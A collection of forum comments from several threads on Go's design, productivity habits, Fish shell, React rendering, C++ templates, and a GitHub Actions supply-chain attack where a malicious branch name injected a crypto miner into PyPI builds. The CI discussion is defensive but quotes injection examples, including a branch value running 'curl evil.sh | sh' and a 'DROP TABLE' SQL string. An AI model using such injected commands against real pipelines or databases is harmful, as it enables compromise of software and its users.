An amateur is generally considered a person who pursues an avocation independent from their source of income. Amateurs and their pursuits are also described as popular, informal, self-taught, user-generated, DIY, and hobbyist.
Calling someone who formally studied something for three years an amateur seems like a stretch. But even then, that disregards the reality of Go usage completely.
Andrew’s assessment is completely fair.
I don’t see how “having no taste” is “a fair assessment”.
go is great if you are an amateur with no taste, like 99% of google employees.
Neither says “Go was designed for” nor “fresh university graduates”. And “google employees” in this sentence sounds more like an example of people who are amateurs with no taste. But even if not, I don’t see how this can be interpreted in a nice/factual way without losing its meaning. Let’s say Go was designed for Google employees. How is that different from Python being designed for teaching and other such things, and what does it say about the language? Is that a criticism? Why would one not want an easy-to-understand language?
If it’s just about it being technically correct (which seems like a stretch as described above) then what’s the thing the sentence wants to convey? In the context I’d expect it to be a criticism.
[1] look it up, their website mentioned they’d add them from pre 1.0 days and that statement only was changed after they added them. Just to counter the wrong trope of “they finally convinced them”.
As we all know, Pike, Thompson, Griesemer, Cox, et al. have no idea what they’re doing.
I feel like this is sort-of correct. They are all quite competent, but I don’t think any of them have good ideas when it comes to language design. On the other hand, I don’t think I can say that I agree with Andrew on language design, since I find Zig a bit Go-ish. There’s a lot of skill behind it and its ideas are being executed well, I just think the ideas come together into something that I feel isn’t particularly good. Obviously quite a few people like Zig and are creating great stuff with it, but the same is true of Go.
As someone who is fairly content with go (mostly due to disillusionment with everything, certainly including go), and who hasn’t used zig, can you explain to me what you don’t like about zig and how it all comes together?
Depends on your definition of “discipline” in a language. Go loses points for: nil pointers, slice/map/channel footguns, no enums/sum types. It gains points for some type safety, memory safety, first-class testing and benchmarking tooling.
I’m not familiar with Erlang but no data races is a clear advantage over Go’s approach to concurrency. Rust is probably the most disciplined language for my own definition of disciplined (too disciplined for some domains like game dev).
Go should only receive partial credit for memory safety. Most sources of memory unsafety are not present in Go, but since data races can result in memory unsafety in Go, it cannot be said to be a memory safe language. There are two approaches to fixing this: the Java way, which is to make it so that data races can’t result in memory unsafety, and the Rust way, which is to make it so that data races can’t happen.
It seems a fair tradeoff, given that it often compiles to smaller and more efficient binaries than C itself.
On the other hand, Go not being memory safe with its choice of tradeoffs (middle-of-the-pack performance with the productivity of a GC) is a very sad fact of life. (It can segfault on race conditions, while similar languages, like Java, might corrupt a given object, but that will still be well-defined Java code and the runtime can just chug along.)
Surely segfaulting, crashing the process, and restarting it is preferable to continuing with some internal object in an invalid/corrupt/wrong state? Not that Go is guaranteed to crash for a data race updating a map.
The former fixes the problem, the latter allows it to continue to propagate.
Segfaulting is the happy case, but it’s up to the OS to detect, not Go (more or less).
What’s much more likely is that it silently corrupts either the user’s application state, or even worse, the runtime’s state, which can yield a completely unexpected error down the line which will be impossible to debug.
But that also seems to be the implication of the java case where you wrote ‘might corrupt a given object’. So the program can still suffer knock on errors of an essentially non-deterministic nature. Just because the runtime is still valid, does not imply that the overall program is.
In Java the object you racily accessed might get into a bad state you didn’t want to get it into, but in Go, you might write into some random other object that had nothing to do with what you were accessing. It’s plain old UB that can result in pretty much anything you can think of.
The scope to which such an error can propagate is way different.
If I open a new thread and create a list with a few objects, they will 100% work in Java’s case. You can’t say the same for Go, as a hidden corruption of the runtime can rear its ugly head anywhere.
Preach. What reinforces this is the awful discourse around software dev.
Advocates for $CURRENT_TECH take most of the oxygen in the room, so toxic positivity is taken to be normative. Software design is often denigrated in favor of duct-taping more libraries together, as people love to advertise that they worship at the altar of Business Value exclusively. Most any design/testing philosophy is usually seen as “too hard,” despite bug counts being where they are. Devs regard make-work like keeping up with tiny, breaking package updates as equivalent to actually delivering value.
It’s like it’s a big social game where the objective is to pretend to care less about craft and instead signal properly that you are in the group of software developers.
I feel like we live in a tech dystopia and I’m mad about it.
As I watch the city burn around me, it’s hard not to feel that way too.
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
I think it’s societal pressures that cause the incentive structure. However, I do think that there is an insidious path dependence that cements a worse-is-better attitude: you start with buggy software, you try to make something better, people take a chance, it fails, and people assume that nothing better can happen, so they don’t invest in better software. Progress is slow and requires risk.
At the end of the day, you are trying to make something better and more aligned with your values. I hope you succeed. I would just caution against calling tens of thousands of people amateurs. No need to paint with so broad a brush.
NB: I don’t like Go and I don’t work for Google. (Just to preempt allegations. :] )
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
See it as a stepping stone. I started as a PHP developer and then moved to Go. Rust or Zig will be my next language. If Go would replace inefficient and messy languages like PHP, Python and Ruby, that would be a win, I think. The good thing about Go is that it is simple enough to appeal to that immense group of amateur developers without taste.
Go will never replace PHP, Python or Ruby because they don’t occupy the same niche to begin with.
Also, it’s rich calling these “messy and inefficient” (besides the usual caveat that it is language implementations, not languages, that can be slow), especially with reference to Go, which is at most in the middle of a theoretical “close to bare metal” scale (the default Go compiler does very few optimizations, that’s how it can output binaries fast, plus the runtime has a fairly simple GC which is no performance champion), and I think it is itself a fairly good contender on the messiness scale, given its weak type system and two million-dollar mistakes instead of only one!
At least Ruby and Python give you a fast and dynamic environment for explorative programming and scripting with the capability of using very productive libraries due to the expressiveness of these languages, something in which Go is quite lacking (and that can be a fair tradeoff, mind you. But so is not taking this tradeoff).
Anyways, this can get subjective pretty quickly, resulting in language flame wars.
Fair enough. But I do think the niches of all of those languages have a large overlap. I group them all in the category: We want to run something on a server, and we don’t want it to be difficult.
‘Messiness’ is just a negative word for ‘dynamic environment.’ Both can be applicable, sometimes even at the same time. But if we are talking about the first quote, about the proliferation of bugs, then the negative interpretation feels like it has more weight. For me at least.
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
Thank you for linking to your talk, I really enjoyed it.
You didn’t even mention my least favorite “feature” of Go: panic and recover. Totally not throw/catch!
I say this as someone who has been writing Go for years. I love Go for problems I just want done ASAP without totally screwing them up, and I love Zig for problems whose solutions I want to be as good as they possibly can be.
I’m gonna learn how to (consistently) finish what I start.
I’ll start with a non-exhaustive list to track all of the things that I’ve started and not finished, so I can explicitly prune the ones I don’t intend to work on, and at least have something to go back to whenever I do have the energy to work on something.
I’ve already made some progress in 2024 on it, so I’ll share a little bit here to help out.
The core insight is that I’m much more likely to finish something if I see consistent progress being made as I work on something, while my “typical” approach has been to ruminate on something for ~3 years and then “draw the rest of the owl” in a single weekend (see: most bunker labs posts as one example).
The reason said typical approach “works” is that it essentially removes all of the potential barriers to finishing the thing (as I’ve already “finished it in my head”), so I can just go straight to the final product.
This obviously doesn’t work for a large subset of problems (i.e. anything but the kind of research PoC I “usually” tend to put out).
Once I got that insight out of the way, the question became “how do I allow for less issue resolution ahead of time, such that I can take on longer projects?”.
What I’ve tried in 2024 so far has been REPL driven development (to a greater degree than I’ve been doing previously, full on Conjure integration, proper setup, etc) and it definitely helped a bit.
In 2025, I’m going to try and “practice finishing”, in the sense of trying to actually either eliminate projects or finish them before moving on to new stuff. I’ve actually been trying to force myself to make a new blog post every month (even if it doesn’t measure up to my usual standards; it’s a different medium), and I also fully completed AoC with a time limit per day (minus the last day to mop up the couple of bits that I had left to do). It’s too early to tell for these yet, but I suspect at the end of next year I’ll see some progress there.
Hope that helps at least a bit (it strongly depends on whether the source for your struggles resembles mine). Happy new year!
If either of you are interested in going nuclear, I can recommend Beeminder which I’ve been using for over a year now: https://www.beeminder.com
In short, you set a goal, like, say, writing 1 blog post a month, and if you don’t reach the goal, you get charged $x. The aim here isn’t to never lose money but to reach a point where you’re sufficiently incentivised (financially) to do whatever your goal is.
It’s pretty nutty at first but once you get into it, it becomes a pretty foolproof setup where I know if I stick something in Beeminder, it’ll get done whether I like it or not.
The founders have been around for over a decade as well and if you derail (don’t hit your goal) for a legitimate reason like you were sick, there are no questions asked around refunds.
It’s less of a traditional business and more of an economics experiment let loose but it works for a lot of people. There’s plenty of theorising on their blog as well: https://blog.beeminder.com/defail/
I had the same problem (that I would be working on too many things and would start new things before finishing existing things), so I instituted a system like the OP’s in Things.app.
I only use projects for things that will require long and sustained effort and I put them into areas called Now/Next/Later. The idea is to work only on things in Now and to finish stuff before pulling in new things.
Each Things project has metadata and a slug that is also the tag for all mails relating to it and the subfolder in my projects directory etc.
One thing I’ve found helpful is I explicitly list out next steps of my project in Obsidian as a checklist.
What I realized is that planning the project requires executive function, which can be worn down by the time I get time to push a project forward at the end of the day. These steps can be very simple or more complex. The goal is to get them down somewhere so that your brain doesn’t have to carry them around anymore. I usually write these early in the day if needed, when I have the most clarity.
Oof - this is a (helpful!) tough observation to hear, because I know this (intellectually) from reading Getting Things Done, and now recognize that I’ve been dropping the ball in a way that I should have already known. Thank you for the prompt to pay more attention to my organizational systems and repair them to a more useful state!
I think it all boils down to determination. If you believe in yourself and commit to finishing everything you start, you will quickly arrive at the conclusion that you shouldn’t start anything.
I saw mention of async prompts becoming a core feature. Would love to help out on this. Have previous experience with Rust (original watchexec author) and fish async prompts (created lucid, the first really solid async prompt IMHO).
Even though I was sick, I got out of bed and rushed to the computer
This is insane. Is the rest of the team that bad that they couldn’t handle it? Making Sentry calls blocking was a clear mistake, not sure how easy it was to avoid, but:
- it should have been fixed the first time! Why does the same blocking issue occur after 2 days??
- knowing the issue, why couldn’t the dev just disable the Sentry calls made by the app (assuming making them non-blocking was hard, which I don’t believe) instead of yapping about moving to the cloud?
Some people really need to learn how to disconnect.
Some people really need to learn how to disconnect.
The response from the wife was kind of sad, too. Kind of accepts that this is how life is, that all he cares about is work. I was surprised the fainting in the bathroom didn’t lead to an ER visit.
Hindsight is 20/20, but when this happened again I’d lean toward waking the dev up in the middle of the night, show him the carnage, and then say, “make it work ASAP.” You can also say you’re open to discussing cloud migration in the future but for now prod needs to stay up.
Seems like the organizational structure protects him from the consequences of his actions too much.
Yes. The real lesson may be to develop the soft skills to define when a problem must be fixed elsewhere and make other people agree and action it that way.
I wish this article had elaborated a bit on specific things creating a “Template Metapocalypse” and how they were later solved. To me, C++ still is a language where the standard library - STL - is a template library. I’m not denying that C++11 did address many problems, but developers still need to think a lot about what is a compile time expression and what is a runtime expression, and that the language imposes different constraints on each.
I’m not certain they were solved. But I think there was a collective opinion at some point that perhaps we might’ve gone too far with templates and we should back off a bit, despite everyone believing that snuffing enough Alexandrescu-inspired templating would bring us to valhalla.
I think there is a difference between say boost::regex (which IIRC is compile-time regexes) and STL … STL is definitely elaborate, but it works fine for me. I’ve never used anything in Boost, which seems to have been heavily influenced by template metaprogramming “fashion”
The error messages could be better; I think that is fundamental, though.
I disagree that the bad error messages problem is fundamental: C++ compilers could encode some common template patterns as internal state and detect common mistakes. This is possible; it “just” increases the compiler’s complexity, because it now has to deal with a meta-C++ language. Rust is generally regarded as having mostly good errors (I’m proud of that), and some of that is smart language design that pushes restrictions closer and closer to the definition so that the compiler has more information available about the problem, but I’d wager that the majority of it is attributable to rustc collecting metadata and doing analysis beyond what is needed to build a functional Rust compiler.
std::regex is originally based on boost::regex design and API, both are runtime regexes. That said, boost::regex kept evolving and improving unlike the std:: one.
For compile-time regexes there is https://github.com/hanickadot/compile-time-regular-expressions, a very fine library which should be the first tool to reach for when one needs a regex in C++, as it’s somewhat uncommon to have to create regexes at runtime.
If you actually do, for instance because you’re building filters based on user input (or simply because your users asked “I want to be able to put regexes in fields”), I’d recommend using Google’s re2 library.
Ah OK, thanks for the correction, I probably should have looked that up … I haven’t used Boost, but I know Boost favors compile time, and it did so back when C++ was weaker at compile time (e.g. before C++11, 14, 17, …)
This was a long time ago, but FWIW
at my first job we used C, and then switched to C++, without STL
second job used C++ with STL, but no Boost at all
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old. The original question was about “Template metapocalypse” – I guess my answer is that C++ is very heterogeneous and you may not have that problem.
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old.
I don’t know, to be honest; I’ve been doing C++ professionally for quite some time now and have really never seen this kind of job. Even something like Arduino ships modern C++ with pretty much the full C++ standard library by default.
Boost is definitely intended to be template based. Bear in mind it’s almost 30 years old, and back in the day the performance gains at runtime were significant AND we didn’t expect compilation to be fast.
Lovely to see the changes and improvements. I keep eyeing Fish to replace my Zsh setup, but worry about losing out on years of muscle memory for POSIX-ish shell syntax.
In other news, I wish the blog had an RSS feed; I’d like to keep up to date with new releases to read about features etc…
As a prime example of this, a while back they added the ability to do FOO="blah" some-command instead of the previous behavior where you needed to prefix it with env. This alone resolved something like 90% of the ways my daily use of fish diverged from what I would have written in bash or zsh.
A colleague of mine recently switched. That surprised me because he had quite an elaborate zsh setup and, as far as I know, fish does not really offer more feature-wise. He told me that he likes fish because it is more “snappy”.
Out of the box, Fish has far more features than Zsh. It doesn’t offer anything extra feature-wise if you install all the Zsh modules that were created to implement Fish features, but those are fiddly and often just don’t work as well. If you want Zsh to be like Fish, just use Fish.
I agree. The point is if you already invested the time to set up zsh with all kinds of modules, then switching to fish is not much of an improvement. So I don’t recommend fish to zsh power users.
That said, I now have anecdotal evidence from one person that fish was still worth switching to.
It’s far less janky than zsh, mostly because you have less user-authored code (users in general, not you specifically). I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my Zsh config for years on end and likewise. On the other hand, I imagine my Zsh config took longer to write than your Fish config, though.
I have also encountered people (online) who didn’t know that you could render web pages on the server.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
People learn by imitation, and that’s 100% necessary in software, so it’s not too surprising. But yeah this is not a good way to do it.
The web is objectively worse that way, e.g. if you have ever watched a non-technical older person trying to navigate the little pop-out hamburger menus and so forth. Or a person without a fast mobile connection.
If I look back a couple decades, when I used Windows, I definitely remember that shell and FTP were barriers to web publishing. It was hard to figure out where to put stuff, and how to look at it.
And just synchronizing it was a problem
PHP was also something I never understood until I learned shell :-) I can see how JavaScript is more natural than PHP for some, even though PHP lets you render on the server.
That’s not completely true: one beautiful JSX thing is that any JSX HTML node is a value, so you can use the whole language at your disposal to create that HTML. Most backend server frameworks use templating instead. For most cases both are equivalent, but sometimes being able to put HTML values in lists and dictionaries, with the full power of the language, does come in handy.
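Roughly, in Python terms (a toy sketch with a hypothetical h() helper, not any real library), the idea is:

    from html import escape

    class Node(str):
        """Already-rendered HTML; the escaping below leaves it alone."""

    def h(tag, *children, **attrs):
        # Escape attribute values and plain-text children; trust Node values.
        attr_str = "".join(f' {k}="{escape(str(v))}"' for k, v in attrs.items())
        inner = "".join(c if isinstance(c, Node) else escape(str(c)) for c in children)
        return Node(f"<{tag}{attr_str}>{inner}</{tag}>")

    # Nodes are ordinary values, so lists, dicts, and comprehensions just work:
    photos = ["beach.jpg", "cabin.jpg"]
    gallery = h("ul", *[h("li", h("img", src=p)) for p in photos])

(A real library would special-case void elements like img; glossed over here.)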
Well, that’s exactly what your OP said. Here is an example in Scala. It’s the same style. It’s not like this was invented by react or even by frontend libraries.
In fact, Scalatags for example is even better than JSX because it is really just values and doesn’t even need any special syntax preprocessor. It is pure, plain Scala code.
Most backend server frameworks use templating instead.
Maybe, but then just pick a better one? OP said “many” and not “most”.
Fine, I misread many as most as I had just woken up. But I’m a bit baffled that a post saying “pick a better one” for any engineering topic has been upvoted like this. Let me go to my team and let them know that we should migrate all our Ruby app to Scala so we can get ScalaTags. JSX was the first values-based HTML builder to get mainstream exposure; you and the sibling comment talk about Scala and Lisp as examples, two very niche languages.
When did I say that this was invented by React? I’m just saying that you can use JSX both on the front end and the back end, which makes it useful for generating HTML. Your post, the sibling comment, and the OP just sound slightly butthurt at JavaScript for some reason, and it’s not my favourite language by any stretch of the imagination, but when someone says “JSX is a good way to generate HTML” and the response is “well, other languages have similar things as well”, I just see that as arguing in bad faith and not bringing anything constructive to the conversation, same as the rest of the thread.
Let me go to my team and let them know that we should migrate all our Ruby app to Scala so we can get ScalaTags.
But the point is that you wouldn’t have to - you could use a Ruby workalike, or implement one yourself. Something like Markaby is exactly that. Just take these good ideas from other languages and use them in yours.
Anyway, it sounds like we are in agreement that this would be better than adopting JavaScript just because it is one of the few non-niche languages which happens to have language-oriented support for tags-as-objects like JSX.
I found that after all I prefer to write what is going to end up as HTML in something that looks as much like HTML as possible. I have tried the it’s-just-pure-data-and-functions approach (mostly with elm-ui, which replaces both HTML and CSS), but in the end I don’t like the context switching it forces on my brain. HTML templates with checks as strong as possible are my current preference. (Of course, it’s excellent if you can also hook into the HTML as a data structure to do manipulations at some stage.)
For doing JSX (along with other frameworks) on the backend, Astro is excellent.
That’s fair. There are advantages and disadvantages when it comes to emulating the syntax of a target language in the host language. I also find JSX not too bad - however, one has to learn it first, which definitely is a lot of overhead; we just tend to forget that once we have learned and used it for a long time.
In the Lisp world, it is super common to represent HTML/XML elements as lists. There’s nothing more natural than performing list operations in Lisp (after all, Lisp stands for LISt Processing). I don’t know how old this is, but it certainly predates React and JSX (Scheme’s SXML has been around since at least the early aughts).
Yeah, JSX is just a weird specialized language for quasiquotation of one specific kind of data that requires an additional compilation step. At least it’s not string templating, I guess…
Every mainstream language, as well as many niche ones, has libraries that build HTML as pure values in the language itself, allowing the full power of the language to be used: defining functions, using control flow syntax, and so on. I predict this approach will become even more popular over time as server-driven apps have a resurgence.
I am not a web developer at all, and do not keep up with web trends, so the first time I heard the term “server-side rendering” I was fascinated and mildly horrified. How were servers rendering a web page? Were they rendering to a PNG and sending that to the browser to display?
I must say I was rather disappointed to learn that server-side rendering just means that the server sends HTML, which is rather anticlimactic, though much more sane than sending a PNG. (I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
(I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
The Bible says “Render unto Caesar the things that are Caesar’s, and unto God the things that are God’s”. Adapting that to today’s question: “Render unto the Screen the things that are the Screen’s, and unto the Browser the things that are the Browser’s”. The screen works in images, the browser works in html. Therefore, you render unto the Browser the HTML. Thus saith the Blasphemy.
(So personally I also think it is an overused word and it sounds silly to me, but the dictionary definition of the word “render” is to extract, convert, deliver, submit, etc. So this use is perfectly in line with the definition and with centuries of usage IRL, so I can’t complain too much really.)
I don’t think it would be a particularly useful distinction to make; as others said you generally “render” HTML when you turn a templated file into valid HTML, or when you generate HTML from another arbitrary format. You could also use “materialize” if you’re writing it to a file, or you could make the argument that it’s compilers all the way down, but IMO that would be splitting hairs.
I’m reminded of the “transpiler vs compiler” ‘debate’, which is also all a bit academic (or rather, the total opposite; vibe-y and whatever/who cares!).
Technically true, but in the context of websites, “render” is almost always used in a certain way. Using it in a different way renders the optimizations my brain is doing useless.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
Unless it was being rendered on the client, I don’t see what’s wrong with that. JSX and React were basically the templating language they were using. There’s no reason that setup cannot be fully server-generated and served as static HTML, and they could use any of the thousands of react components out there.
Yeah if you’re using it as a static site generator, it could be perfectly fine
I don’t have a link handy, but the site I was thinking about had a big janky template with pop-out hamburger menus, so it was definitely being rendered client side. It was slow and big.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
I’m hoping tools like Astro (and other JS frameworks w/ SSR) can shed this baggage. Astro will render your React components to static HTML by default, with normal clientside loading being done on a per-component basis (at least within the initial Astro component you’re calling the React component from).
I’m not sure I would call a custom file type .astro that renders TS, JSX, and MD/X split by a frontmatter “shedding baggage”. In fact, I think we could argue that astro is a symptom of the exact same problem you are illustrating from that quote.
That framework is going to die the same way that Next.JS will: death by a thousand features.
Huh, couldn’t disagree more. Astro is specifically fixing the issue quoted: now you can just make a React app and your baseline perf for your static bits is the same as any other framework’s. The baggage I’m referring to would be the awful SSG frameworks I’ve used that are more difficult to hold correctly than Astro, and of course require plenty of other file types to do what .astro does (.rb, .py, .yml, etc.). The State of JS survey seems to indicate that people share my sentiments (Astro has a retention rate of 94%, the highest of the “metaframeworks”).
I don’t know if I could nail what dictates the whims of devs, but I know it isn’t feature count. If Next dies, it will be because some framework with SSG, SSR, ISR, PPR, RSC, and a dozen more acronym’d features replaced it. (And because OpenNext still isn’t finished.)
Astro’s design is quite nice. It’s flexing into SSR web apps pretty nicely I’d say. The way they organize things isn’t always my favorite, but if it means I can avoid ever touching NextJS I’m happy.
Biggest pet peeve is how VSCode doesn’t seem to surface errors across the whole project: I have to open up files that were affected by a rename of an exported symbol to see red squigglies show up. Feels regressive from a usability perspective, as the computer knows this information, and all the older languages of yore could do this easily in an IDE.
I’m able to do that in IntelliJ. I was surprised it didn’t come up as a setting in vscode. It looks like they’ve been trying to solve the issue since 2016.
For those who are curious but don’t want to pick through the github issue threads:
A malicious PR making a very innocent-looking change to the README used a branch name with shell commands in it, formatted in a way that would cause CI jobs to execute those commands when performing a build for upload to PyPI. Those commands downloaded a crypto miner and embedded it into the release package.
So the automated builds that were getting uploaded to PyPI had the miner, but the source on GitHub did not, and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.
It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.
I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think whoever wrote that code was aware they were trusting the branch name, or which properties of the branch name exactly they were trusting. So the lesson is not really actionable.
I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.
For SQL queries, for example, it seems the industry has learned the lesson, and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.
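The SQL version of the lesson, as a concrete sketch in Python’s sqlite3 (table and input are made up):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    hostile = "x'); DROP TABLE users; --"  # hostile "user input"

    # Naive interpolation: the input becomes part of the SQL text itself.
    # conn.execute(f"INSERT INTO users VALUES ('{hostile}')")

    # Parameterized: the driver passes the value out-of-band, never as SQL.
    conn.execute("INSERT INTO users VALUES (?)", (hostile,))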
The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?
I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…
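You can get a long way toward that today in any general-purpose language; a minimal sketch of the idea in Python (function and branch names made up):

    import subprocess

    def checkout(branch: str) -> None:
        # argv list with shell=False (the default): the branch name reaches git
        # as a single argument, so "; curl evil.sh | sh" in it is just a weird name.
        # (Option-looking names like "-b" would still need validating.)
        subprocess.run(["git", "checkout", branch], check=True)

    # checkout("feature/x")  # raises CalledProcessError if git fails

The point being that “run a shell line” stops being the primitive, so user input never meets a shell parser at all.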
Before all the hip YAML-based CI systems like GitHub Actions, pretty much everyone was using Jenkins.
The sorta modern way to use Jenkins these days is to write Groovy script, which has stuff like checkout scm and various other commands. Most of these come from Java plugins, and so the command never ends up going anywhere near a shell, though you do see a lot of use of the shell command function in practice (e.g. sh "make").
Kind of a shame that Jenkins is so wildly unpopular, and these weird YAML-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be, in my opinion.
Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.
I’ve used Jenkins quite a bit; it’s one of the inspiration sources for that idea, indeed. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.
My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.
I doubt anyone would pick Groovy as a language for anything today.
I use Groovy at $DAILYJOB, and am currently learning Ruby (which has a lot more job listings than Elixir). The appeal of both languages is the same: it is incredibly easy to design DSLs with them (basically what Jenkins and Gradle use). Which is precisely what I work with at $DAILYJOB. The fact Groovy is JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.
This looks really interesting, thanks for the pointer! Maybe it’s already good for things I want to do and I don’t need to make anything at all, or may contribute something to it.
The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.
Yeah, in dealing with GitHub’s YAML hell I’ve been wishing for something closer to a typed programming language with a proper library, e.g. some sort of simplified-Haskell DSL à la Elm, Nix, or Dhall.
They all do?
They all provide ways to build specific branches defined in YAML files, or even via UIs, rather than leaving that work to your shell scripts.
Personally I find all those YAML meta-languages inferior to just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:
What’s the value of a CI server other than running a command on commit?
But back to your point. Why? What you need to do is sanitize user input. That is completely independent of shell script versus another language. Shell scripts are actually higher level than general-purpose programming languages.
I’m certainly not saying that one doesn’t need to sanitize user input.
But I want the underlying system to provide a baseline level of safety. Like in Python: unless I’m calling eval() it doesn’t matter that some input may contain the character sequence os.system(...;, and if I’m not calling os.system() and friends, it doesn’t matter if a string has rm -rf in it. When absolutely any data may end up being executed as code at any time, the system has a problem, as far as I’m concerned.
Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.
In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string in the shell script itself, set any values you want to use as env vars and use those instead. e.g.:
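Something like this (a sketch of the pattern; step and variable names are made up):

    - name: greet
      env:
        HEAD_REF: ${{ github.head_ref }}  # expanded into the environment, not into the script text
      run: echo "Ref is $HEAD_REF"  # the shell just reads a variable; nothing is re-parsed as code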
I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is a lack of good defaults and a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:
echo "Bad: ${{ github.head_ref }}"
echo "Good: $GITHUB_HEAD_REF" # or so @kylewlacy says
I do not see any major difference immediately. Compare to Pug (née Jade), where p= value interpolates with escaping and p!= value is the single-character opt-in for unescaped output.
Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).
But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.
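A sketch of that layering in Python (shlex from the stdlib for the shell layer; assuming PyYAML is available for the YAML layer):

    import shlex
    import yaml  # PyYAML, assumed installed

    branch = 'pr"; curl -s evil.sh | sh; "'
    # Inner layer first: make the value a single, inert shell word.
    step = {"run": f"git checkout {shlex.quote(branch)}"}
    # Outer layer: let the serializer worry about YAML escaping.
    print(yaml.safe_dump({"steps": [step]}))

Get the layers in the wrong order, or hand-roll either one with str.replace, and you are back in injection territory.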
Over a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety”: instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues structurally.
Yeah. The problem is that the echo command interprets things like ${{...}} and executes them. Or is it the shell that does it in any string? I’m not even sure, and that is the problem. No high-level language does that. JavaScript uses eval, which is already bad enough, but at least you can’t use it inside a plain string. You can probably do hello ${eval(...)} in a template literal, but then it is clear that you are evaluating the code inside.
It’s the shell that evaluates $... syntax. $(cmd) executes cmd, ${VAR} reads the shell variable VAR, and in both cases the shell replaces the $... with the output before calling the echo program with the result. Echo is just a dumb program that spits out the arguments it’s given.
Edit: but the ${{ syntax is GitHub Actions’ own syntax, the shell doesn’t see that as GH Actions evaluates it before running the shell command.
The pull_request_target event that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.
Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell script-based privilege escalation code the easy path.
At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.
I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name which executed arbitrary code during GitHub Actions. Sorry if I misunderstood your question.
Hm, the dots don’t connect for me yet. I can just make a PR with changes to the build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?
It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?
So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?
Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?
If I understand it correctly, I can maybe see it used in a non-public context, like for a company’s internal CI.
But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.
Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.
There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.
Thanks for the explanation, I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my GitHub repos; it would seem to me that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?
While the branch name was malicious, is there also a best practice to pull out here for maintainers?
Don’t ever use pull_request_target trigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.
The root cause here is not shell injection. The root cause is that untrusted input gets into a CI run with creds at all. Of course, GitHub Actions doesn’t do that by default; you have to explicitly opt into this with pull_request_target. See the linked SO answer in a sibling comment, it explains the issue quite nicely.
